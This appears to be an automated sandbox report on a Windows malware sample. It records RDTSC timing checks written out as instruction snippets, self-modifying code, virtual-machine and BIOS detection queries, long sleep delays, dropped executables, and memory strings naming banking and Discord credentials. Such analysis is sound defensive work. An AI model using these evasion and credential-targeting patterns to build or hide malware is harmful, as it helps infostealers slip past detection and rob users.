                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F84E34 second address: F84E48 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA030F107ABh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F84FA3 second address: F84FA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F84FA7 second address: F84FAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F85108 second address: F8510C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F8510C second address: F8511A instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA030F107A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F8511A second address: F8511E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F8511E second address: F85122 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F8529F second address: F852A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F852A4 second address: F852D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA030F107B4h 0x00000009 jmp 00007FA030F107B7h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F852D8 second address: F852DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F8B441 second address: F8B445 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F8BD86 second address: F8BD8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F8CBAE second address: F8CBB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F8CBB4 second address: F8CBB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F8CBB8 second address: F8CBBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F8CBBE second address: F8CBD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FA030CAD66Ch 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F958BA second address: F958BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F958BE second address: F958FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA030CAD670h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007FA030CAD678h 0x00000011 jmp 00007FA030CAD66Eh 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: ECB76F second address: ECB7C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA030F107B8h 0x00000007 jmp 00007FA030F107ACh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jmp 00007FA030F107B5h 0x00000016 jno 00007FA030F107A6h 0x0000001c pushad 0x0000001d popad 0x0000001e jmp 00007FA030F107ACh 0x00000023 popad 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: ECB7C4 second address: ECB7C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: ECB7C9 second address: ECB7D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: ECB7D1 second address: ECB7D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: ECB7D7 second address: ECB7E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007FA030F107AEh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: FA9097 second address: FA909D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: FA909D second address: FA90A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: FAEC9E second address: FAECA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FA030CAD666h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: FAD8BB second address: FAD8C9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: FAD8C9 second address: FAD8CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: FAD8CD second address: FAD8D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: FB73BC second address: FB73C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: FBF794 second address: FBF798 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: FBE1D6 second address: FBE1DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: FBE32E second address: FBE332 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: FBE332 second address: FBE345 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA030CAD666h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jbe 00007FA030CAD666h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: FBE4AD second address: FBE4BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jne 00007FA030F107A6h 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: FBEA0A second address: FBEA12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: FBEA12 second address: FBEA16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: FBEA16 second address: FBEA1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: FC2ACA second address: FC2ACE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: FC2ACE second address: FC2B04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA030CAD677h 0x0000000b pop edi 0x0000000c pushad 0x0000000d jmp 00007FA030CAD66Fh 0x00000012 jc 00007FA030CAD66Ch 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: FC2B04 second address: FC2B0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: FC464D second address: FC4666 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FA030CAD668h 0x00000008 push esi 0x00000009 jnc 00007FA030CAD666h 0x0000000f pop esi 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: FC4666 second address: FC466C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: FCDAD1 second address: FCDAD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: FCD92D second address: FCD93A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ebx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pushad 0x0000000b popad 0x0000000c pop ebx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: FD00ED second address: FD00FB instructions: 0x00000000 rdtsc 0x00000002 jo 00007FA030CAD668h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: FD25F1 second address: FD25F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: FDF843 second address: FDF847 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: FE5CBC second address: FE5CD8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA030F107B8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: FE5CD8 second address: FE5CE8 instructions: 0x00000000 rdtsc 0x00000002 je 00007FA030CAD66Ah 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: FE5CE8 second address: FE5CEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: FE5CEE second address: FE5CF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: FE5FAB second address: FE5FB0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: FE6119 second address: FE6125 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FA030CAD666h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: FE6414 second address: FE6441 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA030F107B8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a jmp 00007FA030F107AEh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: FE6441 second address: FE6446 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: FE6446 second address: FE644C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: FE644C second address: FE6468 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FA030CAD666h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA030CAD66Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: FE6468 second address: FE646C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: FE646C second address: FE6482 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA030CAD66Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: FE6482 second address: FE6486 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: FE65A1 second address: FE65A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: FE9A09 second address: FE9A13 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FA030F107A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: FE9A13 second address: FE9A1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: FE9A1C second address: FE9A3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA030F107B4h 0x00000009 pop ecx 0x0000000a jbe 00007FA030F107AEh 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: FE9470 second address: FE9476 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: FE9476 second address: FE947C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: FF02DA second address: FF02DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: FF1B06 second address: FF1B40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FA030F107AFh 0x0000000c popad 0x0000000d push ecx 0x0000000e push ebx 0x0000000f jmp 00007FA030F107B7h 0x00000014 pop ebx 0x00000015 push eax 0x00000016 jbe 00007FA030F107A6h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: FE978E second address: FE9796 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: FEA838 second address: FEA844 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: FEA844 second address: FEA848 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: FEA848 second address: FEA84E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: FEA84E second address: FEA85C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007FA030CAD66Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: FEA85C second address: FEA860 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: FEA860 second address: FEA865 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F153BD second address: F153F0 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FA030F107B0h 0x00000008 jmp 00007FA030F107AAh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 je 00007FA030F107BCh 0x00000018 jmp 00007FA030F107B6h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F1571A second address: F15729 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA030CAD66Ah 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F15729 second address: F1572F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeSpecial instruction interceptor: First address: D69C17 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeSpecial instruction interceptor: First address: D69C98 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeSpecial instruction interceptor: First address: F2EC65 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeSpecial instruction interceptor: First address: D69C1D instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeSpecial instruction interceptor: First address: F987BF instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeMemory allocated: 5700000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeMemory allocated: 58F0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeMemory allocated: 5700000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comWindow / User API: threadDelayed 4795Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comAPI coverage: 3.9 %
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exe TID: 5516Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com TID: 1776Thread sleep time: -180000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comLast function: Thread delayed
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeCode function: 2_2_00406301 FindFirstFileW,FindClose,2_2_00406301
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeCode function: 2_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,2_2_00406CC7
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_0055DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,14_2_0055DC54
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_0056A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,14_2_0056A087
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_0056A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,14_2_0056A1E2
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_0055E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,14_2_0055E472
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_0056A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,14_2_0056A570
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_0052C622 FindFirstFileExW,14_2_0052C622
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_005666DC FindFirstFileW,FindNextFileW,FindClose,14_2_005666DC
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00567333 FindFirstFileW,FindClose,14_2_00567333
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_005673D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,14_2_005673D4
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_0055D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,14_2_0055D921
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_004F5FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,14_2_004F5FC8
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\768400Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\768400\Jump to behavior
                Source: CLaYpUL3zw.exe, CLaYpUL3zw.exe, 00000000.00000002.2258610210.0000000000EE7000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: Climb.com, 0000000E.00000003.2536912337.00000000044CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: Climb.com, 0000000E.00000003.2536912337.00000000044CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                Source: Climb.com, 0000000E.00000003.2536912337.00000000044CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
